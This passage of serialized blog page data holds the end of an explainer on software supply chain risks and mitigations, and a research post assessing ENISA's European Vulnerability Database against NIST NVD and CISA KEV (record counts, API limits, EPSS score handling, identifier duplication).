inject malicious code.",[25,42720,42721,42724],{},[295,42722,42723],{},"OSS-RISK-3 Name Confusion Attacks",": Attackers create components with fake but similar names (typo-squatting), suggesting trustworthy authors (brand-jacking), or playing with common naming patterns (combo-squatting).",[25,42726,42727,42730],{},[295,42728,42729],{},"OSS-RISK-4 Unmaintained Software",": Component or component version is no longer actively updated to provide patches.",[25,42732,42733,42736],{},[295,42734,42735],{},"OSS-RISK-5 Outdated Software",": Project uses outdated component versions despite a newer version’s availability.",[25,42738,42739,42742,42743,27987],{},[295,42740,42741],{},"OSS-RISK-6 Untracked Dependencies",": Developers are unaware of a component dependency, like not having it in an upstream component’s ",[47,42744,42747],{"href":42745,"rel":42746},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fvulnerability-exchange-formats#software-bill-of-materials-sbom",[51],"Software Bill of Materials (SBOM",[25,42749,42750,42753],{},[295,42751,42752],{},"OSS-RISK-7 License Risk",": Component or project lacks a license or uses one incompatible with the developer’s intended use.",[25,42755,42756,42759],{},[295,42757,42758],{},"OSS-RISK-8 Immature Software",": Project fails to apply development best practices, impacting component reliability and security.",[25,42761,42762,42765],{},[295,42763,42764],{},"OSS-RISK-9 Unapproved Change",": Changes to components occur without developers noticing, reviewing, or approving them.",[25,42767,42768,42771],{},[295,42769,42770],{},"OSS-RISK-10 Under\u002FOver-Sized Dependency",": Component provides too little or too much functionality.",[18,42773,42774],{},"Additionally, some examples of OWASP Top 10 Risks related to the software supply chain across other lists include:",[22,42776,42777,42789,42799],{},[25,42778,42779,42786,42788],{},[47,42780,42783],{"href":42781,"rel":42782},"https:\u002F\u002Fowasp.org\u002Fwww-project-kubernetes-top-ten\u002F2022\u002Fen\u002Fsrc\u002FK02-supply-chain-vulnerabilities",[51],[295,42784,42785],{},"Kubernetes Top 10 (K02)",[295,42787,4606],{}," A container can rely on various third-party components and dependencies that can lead to security issues arising from a lack of image integrity, problems with image composition, and known software vulnerabilities.",[25,42790,42791,42798],{},[47,42792,42795],{"href":42793,"rel":42794},"https:\u002F\u002Fowasp.org\u002Fwww-project-mobile-top-10\u002F2023-risks\u002Fm2-inadequate-supply-chain-security.html",[51],[295,42796,42797],{},"Mobile Application Top 10 (M2)",": Attackers can exploit vulnerabilities arising from a lack of secure coding practices, insufficient code reviews, insufficient or insecure app signing and distribution processes, vulnerabilities in third-party software components or libraries, sensitive data exposure, or insufficient security controls across data, encryption, storage.",[25,42800,42801,42808],{},[47,42802,42805],{"href":42803,"rel":42804},"https:\u002F\u002Fowasp.org\u002Fwww-project-machine-learning-security-top-10\u002Fdocs\u002FML06_2023-AI_Supply_Chain_Attacks.html",[51],[295,42806,42807],{},"Machine Learning (ML) Model Top 10 (ML06)",": As the ML supply chain includes more elements than traditional software, attackers can target the traditional supply chain as well as MLOps platforms, data management platforms, model management software, model hubs, and tools for testing and deploying software.",[61,42810,42812],{"id":42811},"why-is-the-software-supply-chain-vulnerable-to-attack","Why is the Software Supply Chain Vulnerable to Attack?",[18,42814,42815],{},"Attackers seek to exploit weaknesses across the development and deployment processes, especially since software supply chains contain complex interactions between different components, libraries, and environments. Vulnerabilities are typically defined across the following areas:",[22,42817,42818,42824,42830,42836,42842],{},[25,42819,42820,42823],{},[295,42821,42822],{},"Infrastructure vulnerabilities",": configuration problems in hardware and software systems, including servers, virtual machines, and network devices.",[25,42825,42826,42829],{},[295,42827,42828],{},"Software vulnerabilities:"," flawed code arising from bugs or faults in proprietary and open-source software, often through dependency confusion where systems download malicious code instead of legitimate libraries.",[25,42831,42832,42835],{},[295,42833,42834],{},"Codebase vulnerabilities",": Harmful code introduced into the underlying software, often through dependency confusion or hijacked updates.",[25,42837,42838,42841],{},[295,42839,42840],{},"Human error or malicious insider intent",": Tricking people into downloading malicious components, like with typosquatting, or insiders who purposefully introduce vulnerabilities.",[25,42843,42844,42847],{},[295,42845,42846],{},"Process vulnerabilities:"," Flaws in established protocols, like failure to property test or review source code.",[61,42849,42851],{"id":42850},"why-do-organizations-face-risk-from-software-supply-chain-attacks","Why do Organizations Face Risk from Software Supply Chain Attacks?",[18,42853,42854],{},"Attackers target the software supply chain because the complex, interconnected dependencies across software tools and services create vulnerabilities that are difficult to detect. Some reasons that organizations often face increased risk include:",[22,42856,42857,42863,42869],{},[25,42858,42859,42862],{},[295,42860,42861],{},"Short release cycles and rapid iterations",": Agile development practices often mean that application security (AppSec) and DevOps teams struggle to track and manage security issues, especially as the use of open source code expands the risk surface.",[25,42864,42865,42868],{},[295,42866,42867],{},"Traditional AppSec processes fall behind",": Accelerated SDLCs, complex applications, and everything-as-code trends make identifying and remediating vulnerabilities difficult as AppSec teams need automated tools to address persistent gaps.",[25,42870,42871,42874],{},[295,42872,42873],{},"Alert fatigue and software supply chain complexity",": High volumes of false positive alerts leave security and AppSec teams struggling to prioritize and respond to issues across complex applications that include third-party components, application programming interfaces (APIs), and open source libraries.",[61,42876,42878],{"id":42877},"what-are-some-sources-of-software-supply-chain-risk","What are Some Sources of Software Supply Chain Risk?",[18,42880,42881],{},"As the software supply chain risks continue to grow, organizations need to ensure the security of all components to mitigate attack risks.",[18,42883,42884],{},"When trying to reduce risk, organizations should consider the following sources:",[22,42886,42887,42893,42899,42905,42911],{},[25,42888,42889,42892],{},[295,42890,42891],{},"Open-source libraries",": Lack of change management processes and documentation can lead to hidden vulnerabilities without incorporating automation like software composition analysis (SCA) tools to help identify, manage, and remediate them.",[25,42894,42895,42898],{},[295,42896,42897],{},"Secrets leaks",": Developers can accidentally leave sensitive information in the source code, including passwords and API keys, that attackers can use to compromise the application.",[25,42900,42901,42904],{},[295,42902,42903],{},"CI\u002FCD pipeline",": Attackers can exploit vulnerabilities in the continuous integration, continuous delivery (CI\u002FCD) pipeline tools that build and test code, making unauthorized changes to source code.",[25,42906,42907,42910],{},[295,42908,42909],{},"Malicious packages in public registries",": Attackers increasingly target public registries, like the Python Package Index (PyPI) and JavaScript package manager NPM, so that developers upload malicious packages with seemingly legitimate names.",[25,42912,42913,42916],{},[295,42914,42915],{},"Malicious installation scripts",": Attackers inject malicious installation scripts into software packages so that they run during setup to compromise entire systems.",[61,42918,42920],{"id":42919},"best-practices-for-mitigating-software-supply-chain-risks","Best Practices for Mitigating Software Supply Chain Risks",[18,42922,42923],{},"Security teams, developers, and AppSec teams need to collaborate effectively and build risk management into all processes, from development to deployment. By following best practices, organizations can mitigate risk across the software supply chain, including those arising from malicious attacks and potential vulnerability exploits.",[993,42925,42927],{"id":42926},"implement-security-controls-for-the-development-environment","Implement Security Controls for the Development Environment",[18,42929,42930],{},"Integrating security controls for the development environment is similar to how the organization protects the production environment. Some typical risk mitigation strategies include:",[22,42932,42933,42936,42939],{},[25,42934,42935],{},"Applying the principle of least privilege by limiting user access to only the resources people need to complete their job functions.",[25,42937,42938],{},"Integrating security tools and standards into each phase of development.",[25,42940,42941],{},"Automating security tasks with CI\u002FCD pipelines.",[993,42943,42945],{"id":42944},"implement-secure-software-development-practices","Implement Secure Software Development Practices",[18,42947,42948],{},"Implementing secure coding standards helps protect against common security flaws. Some actions that organizations can take include:",[22,42950,42951,42954,42957],{},[25,42952,42953],{},"Using automated vulnerability detection tools.",[25,42955,42956],{},"Ensuring software artifact integrity and authenticity with code signing.",[25,42958,42959],{},"Tracking component versions to ensure they use the most secure ones.",[993,42961,42963],{"id":42962},"use-an-sca-tool-to-help-generate-accurate-sboms","Use an SCA Tool to Help Generate Accurate SBOMs",[18,42965,42966],{},"An SBOM acts as a formal record of software components, their relationships, and potential vulnerabilities. Developers can use SCA tools to analyze software applications to identify open-source components and third-party dependencies to expose vulnerabilities that would otherwise be overlooked. When implementing an SCA solution, organizations should ensure that it enables them to:",[22,42968,42969,42972,42975],{},[25,42970,42971],{},"Compare open-source packages against vulnerability databases.",[25,42973,42974],{},"Offer remediation guidance.",[25,42976,42977],{},"Integrate into developer workflows.",[993,42979,42981],{"id":42980},"establish-vulnerability-and-patch-management-processes","Establish Vulnerability And Patch Management Processes",[18,42983,42984],{},"Between the development environment and the source code, organizations need to implement vulnerability and patch management processes that:",[22,42986,42987,42990,42993,42996],{},[25,42988,42989],{},"Use the SCA solution to scan source code for third-party components and libraries that contain known vulnerabilities.",[25,42991,42992],{},"Scan containers to identify potential vulnerabilities.",[25,42994,42995],{},"Implement dynamic and static application security testing to look for potential vulnerabilities.",[25,42997,42998],{},"Prioritize remediation activities based on asset criticality or component reachability",[993,43000,43002],{"id":43001},"engage-in-third-party-risk-assessments","Engage in Third-Party Risk Assessments",[18,43004,43005],{},"As the organization implements more devices and applications, the third-party vendor risks assessments increasingly need to incorporate monitoring for software supply chain risks. As part of evaluating a vendor, organizations should consider:",[22,43007,43008,43011,43014,43017],{},[25,43009,43010],{},"Software development lifecycle processes and controls",[25,43012,43013],{},"Corporate security posture",[25,43015,43016],{},"Vulnerability history, including reporting vulnerabilities and providing security updates",[25,43018,43019],{},"Response strategies, including notifying customers about potential security incidents impacting development environments",[61,43021,43023],{"id":43022},"mitigate-supply-chain-security-risks-vulncheck","Mitigate Supply Chain Security Risks VulnCheck",[18,43025,43026],{},"VulnCheck enables security teams to manage vulnerability and risk with the largest real-time collection of known exploited vulnerabilities, including additional context into and evidence-based evaluation of exploits. VulnCheck enables developers to integrate SBOMs and vulnerability reporting into their workflows so that they can regularly monitor for and mitigate software supply chain risks.",{"title":219,"searchDepth":220,"depth":220,"links":43028},[43029,43030,43031,43032,43033,43034,43035,43042],{"id":42622,"depth":220,"text":42623},{"id":42658,"depth":220,"text":42659},{"id":42694,"depth":220,"text":42695},{"id":42811,"depth":220,"text":42812},{"id":42850,"depth":220,"text":42851},{"id":42877,"depth":220,"text":42878},{"id":42919,"depth":220,"text":42920,"children":43036},[43037,43038,43039,43040,43041],{"id":42926,"depth":1266,"text":42927},{"id":42944,"depth":1266,"text":42945},{"id":42962,"depth":1266,"text":42963},{"id":42980,"depth":1266,"text":42981},{"id":43001,"depth":1266,"text":43002},{"id":43022,"depth":220,"text":43023},"Exploit Intel 101 - Understanding Software Supply Chain Security",{"slug":43045},"understanding-software-supply-chain-security","\u002Fblog\u002Funderstanding-software-supply-chain-security",{"title":42592,"description":43043},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-software-supply-chain-security",[41494],"ktlzirlO0eIZDtPPVdNEPkIfXsyj0s7B4l7AdKnwNAc",{"id":43053,"title":43054,"articles":7,"authors":43055,"body":43057,"date":43720,"description":43721,"extension":234,"image":7,"link":7,"meta":43722,"navigation":237,"path":43724,"seo":43725,"series":7,"stem":43726,"subtype":7,"tags":43727,"__hash__":43728},"blog\u002Fblog\u002Fenisa-euvd.md","Does ENISA EUVD live up to all the hype?",[43056],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":43058,"toc":43694},[43059,43068,43071,43074,43077,43081,43084,43087,43090,43094,43117,43121,43124,43128,43131,43151,43154,43178,43181,43185,43188,43191,43195,43198,43203,43248,43252,43255,43258,43261,43264,43268,43271,43274,43277,43282,43318,43321,43324,43328,43332,43335,43343,43347,43350,43353,43356,43416,43420,43423,43440,43448,43451,43455,43459,43468,43472,43475,43478,43508,43511,43617,43621,43624,43627,43631,43640,43643,43647,43655,43662,43665,43669,43672,43676,43679,43681,43683,43691],[18,43060,43061,43062,43067],{},"Last week’s announcement from ",[47,43063,43066],{"href":43064,"rel":43065},"https:\u002F\u002Fwww.enisa.europa.eu\u002Fnews\u002Fconsult-the-european-vulnerability-database-to-enhance-your-digital-security",[51],"ENISA"," resulted in a lot of hype around the launch of its European Vulnerability Database (EUVD), which officially went live on May 13, 2025.",[18,43069,43070],{},"Given the criticality of the challenges the market is responding to over the issues at MITRE, NIST and CISA relative to the overall CVE program, I decided to take a closer look and evaluate the new service.",[18,43072,43073],{},"At VulnCheck, evaluating new and existing sources of vulnerability and exploit intelligence is a routine part of my work. So, this is nothing new. Today, we collect hundreds of millions of records from over 500+ sources, and our amazing engineering team manages the collection and curation of this data to help organizations counter emerging threats.",[18,43075,43076],{},"What many readers may not realize, however, is that government-funded vulnerability advisory services and databases are not new. In addition to ENISA’s EUVD, VulnCheck has had long-standing initiatives to include Russia’s BDU, China’s CNVD & CNNVD, Japan’s JVN (including JVN iPedia), the NIST NVD in the U.S., and various national CERTs, most of which have been providing vulnerability data for years.",[61,43078,43080],{"id":43079},"why-i-decided-to-publish-this-research-so-soon","Why I Decided to Publish This Research So Soon",[18,43082,43083],{},"Following the funding crisis at CVE.org in April and the ongoing resource constraints at NIST's National Vulnerability Database (NVD), many organizations are actively exploring alternative sources for vulnerability information.",[18,43085,43086],{},"We’ve been fielding a lot of inquiries about this topic. With the recent launch of ENISA’s vulnerability database, a common question has emerged: Is ENISA a viable alternative to CVE.org and the NIST NVD?",[18,43088,43089],{},"This research aims to share experiences and observations to help others better understand how ENISA compares and whether it can serve as a reliable alternative for these established services.\nThis feedback and insight is incredibly important for ENISA’s consideration, which could help them improve their service to make it a more viable alternative data source to CVE.org and NIST NVD.With the coming regulatory requirements of CRA, this database becomes a critical source for organizations doing business in the EU.",[61,43091,43093],{"id":43092},"key-findings","Key Findings",[22,43095,43096,43099,43102,43105,43108,43111,43114],{},[25,43097,43098],{},"EUVD is a strategically important resource aligned with the upcoming Cyber Resilience Act (CRA), making it increasingly relevant for organizations operating in the EU.",[25,43100,43101],{},"EUVD API and website limitations present fewer vulnerabilities than CVE.org\u002FNIST NVD, with over 50,000+ CVEs not surfaced via its main vulnerabilities API endpoint, though many are present on the website and most appear to be available through direct search\u002Fquery.",[25,43103,43104],{},"The exploited vulnerabilities listed in EUVD mirrors CISA KEV but omit some entries on their website, offering narrower visibility than sources like VulnCheck.",[25,43106,43107],{},"The current EUVD API presents performance constraints and limited support for high-volume or automated use, which may impact operational workflows.",[25,43109,43110],{},"Important metadata, such as CWE, CPE, and CVSS Source, is not yet available, reducing EUVD’s utility for in-depth risk analysis.",[25,43112,43113],{},"The implementation of EPSS includes scoring modifications that introduces the possibility of misleading downstream consumers.",[25,43115,43116],{},"Though launched as “operational,” the database is still labeled “beta,” signaling that it is an evolving platform and doesn't appear to be ready for production-level dependency.",[61,43118,43120],{"id":43119},"vulnerability-count-confusion","Vulnerability Count Confusion",[18,43122,43123],{},"When analyzing a new source of vulnerability and exploitation intelligence, my first instinct is to look at raw counts. This provides a foundational comparison point with existing sources. This led to some rather confusing findings in the case of ENISA's EUVD.",[993,43125,43127],{"id":43126},"initial-observation","Initial Observation",[18,43129,43130],{},"Two specific counts stood out to me:",[22,43132,43133,43136,43139,43142],{},[25,43134,43135],{},"The total number of vulnerabilities.",[25,43137,43138],{},"The total number of exploited vulnerabilities.\nI used two approaches to gather these numbers:",[25,43140,43141],{},"Reviewing the raw counts on the EUVD website.",[25,43143,43144,43145,43150],{},"Querying the ",[47,43146,43149],{"href":43147,"rel":43148},"https:\u002F\u002Feuvdservices.enisa.europa.eu\u002Fapi\u002Fvulnerabilities",[51],"EUVD vulnerabilities API"," and comparing results with CVE.org and the NIST NVD.",[18,43152,43153],{},"When querying the EUVD vulnerabilities API endpoint, I received the following response:",[1354,43155,43157],{"className":22307,"code":43156,"language":22309,"meta":219,"style":219},"\"total\": 243,969\n",[886,43158,43159],{"__ignoreMap":219},[1373,43160,43161,43163,43166,43168,43170,43173,43175],{"class":1375,"line":1376},[1373,43162,183],{"class":1387},[1373,43164,43165],{"class":1391},"total",[1373,43167,183],{"class":1387},[1373,43169,20051],{"class":4640},[1373,43171,43172],{"class":5467},"243",[1373,43174,5437],{"class":4640},[1373,43176,43177],{"class":5467},"969\n",[18,43179,43180],{},"This immediately raised a red flag: why are over 50,000 CVEs not included in the ENISA vulnerabilities API endpoint?",[993,43182,43184],{"id":43183},"verifying-vulnerability-counts-via-the-website","Verifying Vulnerability Counts via the Website",[18,43186,43187],{},"To investigate further, I checked the EUVD website directly. Navigating to the \"Full Vulnerability List\" and accessing the last page (page 26,492), I found that each page displays 10 records. This gives us: 26,492 pages × 10 records = 264,920 vulnerabilities.",[18,43189,43190],{},"Still, this number is well below the total CVE count published to date.",[993,43192,43194],{"id":43193},"vulnerability-count-comparison-as-of-may-17","Vulnerability Count Comparison (as of May 17)",[18,43196,43197],{},"To put things in perspective, here’s a side-by-side comparison of vulnerability counts across ENISA EUVD’s website, EUVD’s vulnerability API, NIST NVD total count, and NIST NVD total count w\u002Fo rejected :",[18,43199,43200],{},[295,43201,43202],{},"Vulnerability Count as of May 17th",[307,43204,43205,43214],{},[310,43206,43207],{},[313,43208,43209,43211],{},[316,43210,2468],{},[316,43212,43213],{},"Vulnerability Count",[336,43215,43216,43224,43232,43240],{},[313,43217,43218,43221],{},[341,43219,43220],{},"ENISA EUVD (website)",[341,43222,43223],{},"264,920",[313,43225,43226,43229],{},[341,43227,43228],{},"ENISA EUVD (vulnerabilities API)",[341,43230,43231],{},"243,969",[313,43233,43234,43237],{},[341,43235,43236],{},"NIST NVD Total",[341,43238,43239],{},"294,484",[313,43241,43242,43245],{},[341,43243,43244],{},"NIST NVD (w\u002Fo Rejected)",[341,43246,43247],{},"279,338",[993,43249,43251],{"id":43250},"finding-the-missing-vulnerabilities","Finding the Missing Vulnerabilities",[18,43253,43254],{},"As a researcher, I naturally wanted to understand which 50,000+ CVEs were not returned from the ENISA EUVD vulnerabilities API.",[18,43256,43257],{},"To dig deeper, I compared the full set of NIST NVD’s 294,484 with the CVEs presented in the vulnerabilities API endpoint. From this comparison, I compiled a list of CVEs that were not returned from the endpoint.",[18,43259,43260],{},"While analyzing this dataset, I noticed vulnerabilities with an EPSS score greater than .1 are missing from the vulnerabilities API endpoint, which account for 20,559 of the missing vulnerabilities. For those not familiar with EPSS, higher scores have a higher likelihood that a software vulnerability will be exploited in the wild.",[18,43262,43263],{},"After a quick spot check using the ENISA EUVD website’s search interface, I confirmed that many of these CVEs were, in fact, available through the website's search function and available for direct query using the direct query vulnerability API endpoint. So the data exists, it’s just not presented in the vulnerabilities API or the website in many cases and requires you to have a complete list of CVE IDs or ENISA IDs to pull the data.",[993,43265,43267],{"id":43266},"further-exploring-exploited-vulnerability-counts","Further Exploring Exploited Vulnerability Counts",[18,43269,43270],{},"Exploring exploited vulnerabilities and discovering new data sources is one of my favorite areas of research. So, when a new resource from a reputable organization like ENISA comes online, I’m always eager to dig in and see what it adds to the ecosystem.",[18,43272,43273],{},"Unfortunately, I was disappointed to find that the ENISA EUVD Exploited Vulnerabilities list is merely a subset of CISA’s Known Exploited Vulnerabilities (KEV). That immediately raised a question: why are some CISA KEV entries not listed on EUVD’s all exploited vulnerabilities dashboard?",[18,43275,43276],{},"To investigate, I used the same methodology as with total vulnerability counts comparing raw numbers across sources.",[18,43278,43279],{},[295,43280,43281],{},"Exploited Vulnerabilities As of May 17",[307,43283,43284,43294],{},[310,43285,43286],{},[313,43287,43288,43291],{},[316,43289,43290],{},"Exploited Vulnerability Source",[316,43292,43293],{},"CVE Count",[336,43295,43296,43304,43311],{},[313,43297,43298,43301],{},[341,43299,43300],{},"ENISA EUVD Exploited Vulnerabilities (Website)",[341,43302,43303],{},"1,270",[313,43305,43306,43308],{},[341,43307,31643],{},[341,43309,43310],{},"1,345",[313,43312,43313,43315],{},[341,43314,1233],{},[341,43316,43317],{},"3,672",[18,43319,43320],{},"I manually validated that every exploited vulnerability listed by ENISA is also present in the CISA KEV list, confirming it's a strict subset. However, this leaves 75 CISA KEV vulnerabilities unaccounted for in ENISA’s dashboard that includes “all exploited vulnerabilities”.",[18,43322,43323],{},"When I used the search functionality for these individual CVEs using the EUVD website’s search function, the results were returned, aligning with the same experience I had with vulnerability counts.",[61,43325,43327],{"id":43326},"technical-limitations-of-the-euvd-api","Technical Limitations of the EUVD API",[993,43329,43331],{"id":43330},"slow-api-access","Slow API Access",[18,43333,43334],{},"Downloading the currently available records from the EUVD vulnerabilities API endpoint proved time-consuming. Others I've spoken with who are also exploring the EUVD dataset have reported similar experiences, with download times exceeding multiple hours in most cases. These limitations make it challenging to automate or scale interactions with the EUVD API, given its current limitations.",[18,43336,43337,43338,59],{},"To be fair, performance bottlenecks like this are not unique to vulnerability databases as anyone that’s used NIST NVD can attest to this. At VulnCheck, we experienced similar constraints before migrating to a more modern, scalable architecture as our customer base has grown. I discussed that transition and some of the architectural decisions behind it in ",[47,43339,43342],{"href":43340,"rel":43341},"https:\u002F\u002Fwww.linkedin.com\u002Fposts\u002Fpatrickmgarrity_cybersecurity-infosecurity-riskmanagement-activity-7316543042155421697-97Og?utm_source=share&utm_medium=member_desktop&rcm=ACoAAADShEQBPA7bU2zaIIHMTqDWMnEOq7PYu7g",[51],"this video",[61,43344,43346],{"id":43345},"modified-epss-scores-in-apis","Modified EPSS Scores in APIs",[18,43348,43349],{},"ENISA appears to have made a mistake in its implementation of EPSS scores, a common issue among projects integrating EPSS. Misunderstandings around how EPSS works often lead to inadvertent misuse or misrepresentation of the scores.",[18,43351,43352],{},"In this case, ENISA has enriched their API data with EPSS values but removed the fifth decimal place and converted the original decimal scores into percentages by multiplying them by 100, resulting in an EPSS score range between 0 and 100. It's common to present a probability as a percentage in a UI, however this conversion in the API unfortunately doesn't reflect that the score was modified. This results in a misrepresentation of the actual EPSS score itself and introduces the possibility of misleading downstream consumers.",[18,43354,43355],{},"Here are a few examples of the scoring differences:",[307,43357,43358,43373],{},[310,43359,43360],{},[313,43361,43362,43364,43367,43370],{},[316,43363,319],{},[316,43365,43366],{},"ENISA EPSS (API)",[316,43368,43369],{},"First EPSS Score",[316,43371,43372],{},"First EPSS Percentile",[336,43374,43375,43388,43402],{},[313,43376,43377,43380,43382,43385],{},[341,43378,43379],{},"CVE-2020-6144",[341,43381,24698],{},[341,43383,43384],{},"0.09991",[341,43386,43387],{},"0.92618",[313,43389,43390,43393,43396,43399],{},[341,43391,43392],{},"CVE-2024-3400",[341,43394,43395],{},"94.29",[341,43397,43398],{},"0.94286",[341,43400,43401],{},"0.99926",[313,43403,43404,43407,43410,43413],{},[341,43405,43406],{},"CVE-2019-20074",[341,43408,43409],{},".29",[341,43411,43412],{},"0.00287",[341,43414,43415],{},"0.51809",[61,43417,43419],{"id":43418},"enrichment-data-available-in-other-sources","Enrichment Data Available in Other Sources",[18,43421,43422],{},"There are a handful of important vulnerability enrichments available through NIST NVD \u002F CVE.org that are not available in ENISA EUVD. A few of the fields I would expect to see in a vulnerability database that are not present in EUVD include:",[22,43424,43425,43428,43431,43434,43437],{},[25,43426,43427],{},"CWE",[25,43429,43430],{},"CPE",[25,43432,43433],{},"Reference Tags",[25,43435,43436],{},"Metadata for source (CVSS Scores, Identifiers)",[25,43438,43439],{},"Support for multiple CVSS versions on a single record.",[18,43441,43442,43443,43447],{},"There are also vulnerabilities without CVSS scores that are available in NIST NVD. Here is an example: ",[47,43444,43445],{"href":43445,"rel":43446},"https:\u002F\u002Feuvd.enisa.europa.eu\u002Fvulnerability\u002FCVE-2020-2106",[51],". Leveraging NIST NVD as a source, could help fill some of ENISA's gaps in historical data.",[18,43449,43450],{},"Several of these are current limitations of CVE.org as well.",[61,43452,43454],{"id":43453},"observations-of-identifiers-aliases","Observations of Identifiers \u002F Aliases",[993,43456,43458],{"id":43457},"cves-with-duplicate-euvd-identifiers","CVEs with Duplicate EUVD Identifiers",[18,43460,43461,43462,43467],{},"A handful of CVEs in the database contain multiple EUVD identifiers, which poses a host of challenges for consumers as it can’t be assumed that there will always be a 1-for-1 match.\nAn Example of this is ",[47,43463,43466],{"href":43464,"rel":43465},"https:\u002F\u002Feuvd.enisa.europa.eu\u002Fvulnerability\u002FCVE-2025-25286",[51],"CVE-2025-25286"," which has two EUVD IDs which include EUVD-2025-0100, EUVD-2025-4100. I’m curious how ENISA plans to address duplicate identifiers moving forward.",[993,43469,43471],{"id":43470},"multiple-aliasesids-stored-into-a-single-string","Multiple Aliases\u002FIDs Stored into a Single String",[18,43473,43474],{},"There are several instances where EUVD stores multiple records into a single string. This makes it challenging for consumers of the API, requiring them to parse through and identify unique identifiers and the source they came from. There could also be potential collisions between sources in the future as the amount of vulnerability sources grows.",[18,43476,43477],{},"Here is an example for EUVD-2022-0047:",[1354,43479,43481],{"className":22307,"code":43480,"language":22309,"meta":219,"style":219},"\"aliases\": \"CVE-2024-13484\\nGHSA-58fx-7v9q-3g56\\n\"\n",[886,43482,43483],{"__ignoreMap":219},[1373,43484,43485,43487,43490,43492,43494,43496,43499,43501,43504,43506],{"class":1375,"line":1376},[1373,43486,183],{"class":1387},[1373,43488,43489],{"class":1391},"aliases",[1373,43491,183],{"class":1387},[1373,43493,20051],{"class":4640},[1373,43495,183],{"class":1387},[1373,43497,43498],{"class":1391},"CVE-2024-13484",[1373,43500,8943],{"class":2326},[1373,43502,43503],{"class":1391},"GHSA-58fx-7v9q-3g56",[1373,43505,8943],{"class":2326},[1373,43507,19057],{"class":1387},[18,43509,43510],{},"An alternative structure could include the source of the identifier:",[1354,43512,43514],{"className":22307,"code":43513,"language":22309,"meta":219,"style":219},"\"aliases\": [\n {\n \"id\": \"CVE-2024-13484\",\n \"source\": \"CVE\"\n },\n {\n \"id\": \"GHSA-58fx-7v9q-3g56\",\n \"source\": \"GitHub\"\n }\n]\n",[886,43515,43516,43528,43532,43550,43567,43571,43575,43593,43609,43613],{"__ignoreMap":219},[1373,43517,43518,43520,43522,43524,43526],{"class":1375,"line":1376},[1373,43519,183],{"class":1387},[1373,43521,43489],{"class":1391},[1373,43523,183],{"class":1387},[1373,43525,20051],{"class":4640},[1373,43527,9050],{"class":1383},[1373,43529,43530],{"class":1375,"line":220},[1373,43531,26177],{"class":1383},[1373,43533,43534,43536,43538,43540,43542,43544,43546,43548],{"class":1375,"line":1266},[1373,43535,19050],{"class":9152},[1373,43537,26412],{"class":9155},[1373,43539,183],{"class":9152},[1373,43541,4606],{"class":1383},[1373,43543,4883],{"class":9173},[1373,43545,43498],{"class":9176},[1373,43547,183],{"class":9173},[1373,43549,9062],{"class":1383},[1373,43551,43552,43554,43557,43559,43561,43563,43565],{"class":1375,"line":1852},[1373,43553,19050],{"class":9152},[1373,43555,43556],{"class":9155},"source",[1373,43558,183],{"class":9152},[1373,43560,4606],{"class":1383},[1373,43562,4883],{"class":9173},[1373,43564,319],{"class":9176},[1373,43566,19057],{"class":9173},[1373,43568,43569],{"class":1375,"line":4692},[1373,43570,23985],{"class":1383},[1373,43572,43573],{"class":1375,"line":4724},[1373,43574,26177],{"class":1383},[1373,43576,43577,43579,43581,43583,43585,43587,43589,43591],{"class":1375,"line":4756},[1373,43578,19050],{"class":9152},[1373,43580,26412],{"class":9155},[1373,43582,183],{"class":9152},[1373,43584,4606],{"class":1383},[1373,43586,4883],{"class":9173},[1373,43588,43503],{"class":9176},[1373,43590,183],{"class":9173},[1373,43592,9062],{"class":1383},[1373,43594,43595,43597,43599,43601,43603,43605,43607],{"class":1375,"line":4768},[1373,43596,19050],{"class":9152},[1373,43598,43556],{"class":9155},[1373,43600,183],{"class":9152},[1373,43602,4606],{"class":1383},[1373,43604,4883],{"class":9173},[1373,43606,2485],{"class":9176},[1373,43608,19057],{"class":9173},[1373,43610,43611],{"class":1375,"line":4792},[1373,43612,27147],{"class":1383},[1373,43614,43615],{"class":1375,"line":4798},[1373,43616,7103],{"class":1383},[61,43618,43620],{"id":43619},"additional-questions-about-data-quality-enrichment","Additional Questions About Data Quality \u002F Enrichment",[18,43622,43623],{},"While conducting this research, I wanted to further evaluate the data quality. However, due to time constraints (and more critically) the challenges involved in obtaining complete and accurate data, a deeper analysis will take more time. There are many observations I made during my research that I just didn't have time to chase down and validate and would encourage others to share their own experiences.",[18,43625,43626],{},"That said, my general impression is that the EUVD currently offers less complete data, with a delivery model that makes it difficult for consumers to access and consume effectively. I’m looking forward to seeing how they improve on this in the future.",[61,43628,43630],{"id":43629},"lack-of-feedback-loop-for-those-that-want-to-help","Lack of Feedback Loop for Those That Want to Help",[18,43632,43633,43634,43639],{},"ENISA EUVD ",[47,43635,43638],{"href":43636,"rel":43637},"https:\u002F\u002Feuvd.enisa.europa.eu\u002Ffaq",[51],"FAQ"," currently states, “We do not send individual follow-ups.” This policy is disappointing, as it sends a message to consumers and researchers who want to help improve data quality with a one-way communication model with no feedback loop, which is incredibly valuable when building a new service. A more collaborative approach with the security community would significantly benefit the EUVD project and likely improve its quality and reliability.",[18,43641,43642],{},"While some may view NIST NVD and CVE.org as less than fully receptive to community input, my experience has been that they are generally responsive to researchers and users, even if there’s still plenty of room for improvement. This kind of open dialogue and engagement is important if ENISA EUVD hopes to be seen as a viable and trusted alternative.",[61,43644,43646],{"id":43645},"does-enisa-intended-for-people-to-rely-on-euvd-or-is-it-in-beta","Does ENISA Intended For People To Rely On EUVD, or Is It In Beta?",[18,43648,43649,43650,43654],{},"While ENISA issued a ",[47,43651,43653],{"href":43064,"rel":43652},[51],"press release"," announcing the EUVD as “operational”, the website itself states:",[43656,43657,43659],"author-quote",{"author":43658},"ENISA EUVD Website",[18,43660,43661],{},"This website is currently in its beta phase. We appreciate your collaboration in reporting any inaccurate or incomplete information via the link below 'Provide feedback.",[18,43663,43664],{},"This sends mixed messages to users, particularly those evaluating EUVD as a potential alternative to CVE.org or the NIST NVD. The contradiction between an “operational” status and a “beta” disclaimer creates uncertainty around the platform’s maturity and reliability.",[61,43666,43668],{"id":43667},"does-enisa-euvd-live-up-to-the-hype","Does ENISA EUVD Live Up To The Hype?",[18,43670,43671],{},"In its current form, the EUVD lacks the completeness, accessibility, and enrichment required by enterprise consumers and national CERTs alike. With foundational work still needed on API design, data quality, and community collaboration, ENISA faces a steep climb if it hopes to become an alternative source to more mature sources like CVE.org or NIST NVD. That said, its strategic importance for organizations doing business in the European Union is key for the success of this new tool mandated by the Cyber Resilience Act (CRA).",[61,43673,43675],{"id":43674},"special-thanks","Special 